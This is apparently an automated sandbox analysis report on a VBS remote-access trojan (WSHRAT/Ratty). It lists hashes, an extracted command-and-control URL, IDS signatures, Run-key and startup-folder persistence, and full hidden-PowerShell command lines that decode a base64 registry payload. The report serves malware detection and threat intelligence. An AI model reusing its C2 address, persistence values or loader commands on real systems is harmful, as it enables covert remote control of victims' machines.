Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-05-2022 22:18
Static task
static1
Behavioral task
behavioral1
Sample
04cddb4f63ec0f578e61ab4424180f54a5a960040b618d87c27815c4a4bcebcc.vbs
Resource
win7-20220414-en
General
-
Target
04cddb4f63ec0f578e61ab4424180f54a5a960040b618d87c27815c4a4bcebcc.vbs
-
Size
375KB
-
MD5
03a7ae43aaf89ff7e1764d216c90f22e
-
SHA1
fe638120295e1d35073973caf825b0996350ce76
-
SHA256
04cddb4f63ec0f578e61ab4424180f54a5a960040b618d87c27815c4a4bcebcc
-
SHA512
d8a89b30cf8314d37c4667811436697c5ad2afa94a01d0eb49819ee49dca2dd3452e24380b155267b7690ba91385c54812ed8ba59021addbaf5502fe53db7ac1
Malware Config
Extracted
wshrat
http://pluginsrv2.duckdns.org:8899
Signatures
-
Ratty Rat Payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\ntfsmgr.jar family_ratty -
suricata: ET MALWARE WSHRAT CnC Checkin
suricata: ET MALWARE WSHRAT CnC Checkin
-
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1
-
Blocklisted process makes network request 19 IoCs
Processes:
WScript.exeflow pid process 4 1732 WScript.exe 6 1732 WScript.exe 7 1732 WScript.exe 9 1732 WScript.exe 10 1732 WScript.exe 11 1732 WScript.exe 13 1732 WScript.exe 14 1732 WScript.exe 15 1732 WScript.exe 17 1732 WScript.exe 18 1732 WScript.exe 19 1732 WScript.exe 21 1732 WScript.exe 22 1732 WScript.exe 23 1732 WScript.exe 25 1732 WScript.exe 26 1732 WScript.exe 27 1732 WScript.exe 29 1732 WScript.exe -
Drops startup file 2 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBajdBaxwJ.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBajdBaxwJ.vbs WScript.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
WScript.exeWScript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr = "\"C:\\Program Files\\Java\\jre7\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\ntfsmgr.jar\"" WScript.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\software\microsoft\windows\currentversion\run WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\JBajdBaxwJ = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\JBajdBaxwJ.vbs\"" WScript.exe Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JBajdBaxwJ = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\JBajdBaxwJ.vbs\"" WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1076 powershell.exe 1716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1076 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.execmd.exeWScript.exedescription pid process target process PID 1648 wrote to memory of 1076 1648 WScript.exe powershell.exe PID 1648 wrote to memory of 1076 1648 WScript.exe powershell.exe PID 1648 wrote to memory of 1076 1648 WScript.exe powershell.exe PID 1648 wrote to memory of 1732 1648 WScript.exe WScript.exe PID 1648 wrote to memory of 1732 1648 WScript.exe WScript.exe PID 1648 wrote to memory of 1732 1648 WScript.exe WScript.exe PID 1648 wrote to memory of 1796 1648 WScript.exe cmd.exe PID 1648 wrote to memory of 1796 1648 WScript.exe cmd.exe PID 1648 wrote to memory of 1796 1648 WScript.exe cmd.exe PID 1796 wrote to memory of 580 1796 cmd.exe javaw.exe PID 1796 wrote to memory of 580 1796 cmd.exe javaw.exe PID 1796 wrote to memory of 580 1796 cmd.exe javaw.exe PID 1648 wrote to memory of 1884 1648 WScript.exe javaw.exe PID 1648 wrote to memory of 1884 1648 WScript.exe javaw.exe PID 1648 wrote to memory of 1884 1648 WScript.exe javaw.exe PID 1732 wrote to memory of 1716 1732 WScript.exe powershell.exe PID 1732 wrote to memory of 1716 1732 WScript.exe powershell.exe PID 1732 wrote to memory of 1716 1732 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\04cddb4f63ec0f578e61ab4424180f54a5a960040b618d87c27815c4a4bcebcc.vbs"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$deleBravo = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$deleBravo=$deleBravo.replace('%&','m');$Abt = [Convert]::FromBase64String($deleBravo);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JBajdBaxwJ.vbs"2⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$deleBravo = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$deleBravo=$deleBravo.replace('%&','A');$Abt = [Convert]::FromBase64String($deleBravo);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre7\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt2⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -version3⤵PID:580
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"2⤵PID:1884
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\output.txtFilesize
144B
MD59891012748a9c21c96f7787f0a9bf750
SHA1097a201687c23a42c309ef864bbddcfa6bd42a1c
SHA256bdf666fbb9293ac2f346e73bbd85d2fd92fde9595773d450cb41cb0c943ab977
SHA512196d1562d8f400799bdb698a66fe4d1ec688f3f35d3986d8e3b78952d6025d2ba048218626ccf5547b9195b39987d7ec41f44424e377865c11245d5447f29671
-
C:\Users\Admin\AppData\Roaming\JBajdBaxwJ.vbsFilesize
38KB
MD52040b52f012cebd59d5aede0556b6636
SHA12acbfc90f0cffdc6332f1747474e120c25c836e9
SHA256d9d8d699a6e5d05328741dd6e4b9133e5bbaf1b73b8e548069dcb4dce0cf8fee
SHA512ea594a4d76f231add4989a32ae9c354d933c049bfb94ed05ced4b7879a9fe12ae02fdac53ce9d615de99f1d61c83500bb306178689e32fe8380ffa8f9ba2b742
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5d562431dfee03f4536d8233c9467eb4e
SHA143163c45f0a27fb44847387a16da461da38eebb8
SHA2562f4b71c88cc717523825ad9ff1a0e2f9ea37afec15518bba2cd37896d558eeea
SHA512043134a0fc1ee477947dae7754fdb89f57e11046c450be19c012938f60a40f8eec245c16f54c5820bb6dc38287194c1f686239a9d4369a9c78bc88f7bf7a9811
-
C:\Users\Admin\AppData\Roaming\ntfsmgr.jarFilesize
155KB
MD5e4bb4db10f10224e8a633c93573ab288
SHA1c5acb8bfa1f113fc11bc1cb487c6eec8268b04cc
SHA256cd5820b5eb588435524d0044d1a3324c84ed9cce9791fe957fea223fb5c82bb6
SHA5121be27513a99afe955a37b8c373558317af6461989072df782e3c32315e72a70a0f0e9d8a9b7b0f67fd0cd4a4765589cb82069c65b1d772745ae2a392dcfc5abb
-
memory/580-65-0x0000000000000000-mapping.dmp
-
memory/1076-59-0x000000001B760000-0x000000001BA5F000-memory.dmpFilesize
3.0MB
-
memory/1076-57-0x000007FEF3370000-0x000007FEF3D93000-memory.dmpFilesize
10.1MB
-
memory/1076-55-0x0000000000000000-mapping.dmp
-
memory/1076-61-0x000000000257B000-0x000000000259A000-memory.dmpFilesize
124KB
-
memory/1076-60-0x0000000002574000-0x0000000002577000-memory.dmpFilesize
12KB
-
memory/1076-58-0x000007FEF2810000-0x000007FEF336D000-memory.dmpFilesize
11.4MB
-
memory/1648-54-0x000007FEFB6F1000-0x000007FEFB6F3000-memory.dmpFilesize
8KB
-
memory/1716-91-0x0000000000000000-mapping.dmp
-
memory/1716-95-0x000007FEF3D10000-0x000007FEF4733000-memory.dmpFilesize
10.1MB
-
memory/1716-96-0x000007FEF31B0000-0x000007FEF3D0D000-memory.dmpFilesize
11.4MB
-
memory/1716-97-0x00000000024F4000-0x00000000024F7000-memory.dmpFilesize
12KB
-
memory/1716-98-0x000000001B890000-0x000000001BB8F000-memory.dmpFilesize
3.0MB
-
memory/1716-99-0x00000000024FB000-0x000000000251A000-memory.dmpFilesize
124KB
-
memory/1732-62-0x0000000000000000-mapping.dmp
-
memory/1796-63-0x0000000000000000-mapping.dmp
-
memory/1884-78-0x0000000000000000-mapping.dmp
-
memory/1884-92-0x0000000002310000-0x0000000005310000-memory.dmpFilesize
48.0MB